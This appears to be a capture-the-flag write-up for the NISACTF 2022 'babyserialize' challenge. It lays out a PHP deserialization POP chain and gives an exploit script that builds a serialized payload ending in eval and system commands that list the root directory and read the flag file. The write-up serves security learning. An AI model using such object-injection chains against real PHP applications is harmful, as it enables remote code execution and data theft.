[NISACTF 2022]babyserialize
- 审计源码
- 构建pop链
NISA.__invoke()
=>Ilovetxw.__toString()
=>four.__set(fun,"sixsixsix")
=>Ilovetxw.__call(nisa,"sixsixsix")
=>TianXiWei.__wakeup()
- 写exp
<?php
class NISA
{
public $fun = "show_me_fla";
public $txw4ever;
public function __wakeup()
{
if ($this->fun == "show_me_flag") {
hint();
}
}
function __call($from, $val)
{
$this->fun = $val[0];
}
public function __toString()
{
echo $this->fun;
return " ";
}
public function __invoke()
{
checkcheck($this->txw4ever);
@eval($this->txw4ever);
}
}
class TianXiWei
{
public $ext;
public $x;
public function __wakeup()
{
$this->ext->nisa($this->x);
}
}
class Ilovetxw
{
public $huang;
public $su;
public function __call($fun1, $arg)
{
$this->huang->fun = $arg[0];
}
public function __toString()
{
$bb = $this->su;
return $bb();
}
}
class four
{
public $a = "TXW4EVER";
private $fun = 'abc';
public function __set($name, $value)
{
$this->$name = $value;
if ($this->fun = "sixsixsix") {
strtolower($this->a);
}
}
}
$a = new NISA;
$b = new Ilovetxw;
$c = new four;
$d = new Ilovetxw;
$f = new TianXiWei;
//
//$a->txw4ever = 'SYSTEM("ls /");';
$a->txw4ever = 'SYSTEM("cat /fllllllaaag");';
$b->su = $a;
$c->a = $b;
$d->huang = $c;
$f->x = "sixsixsix";
$f->ext = $d;
echo urlencode(serialize($f));
//
得到flag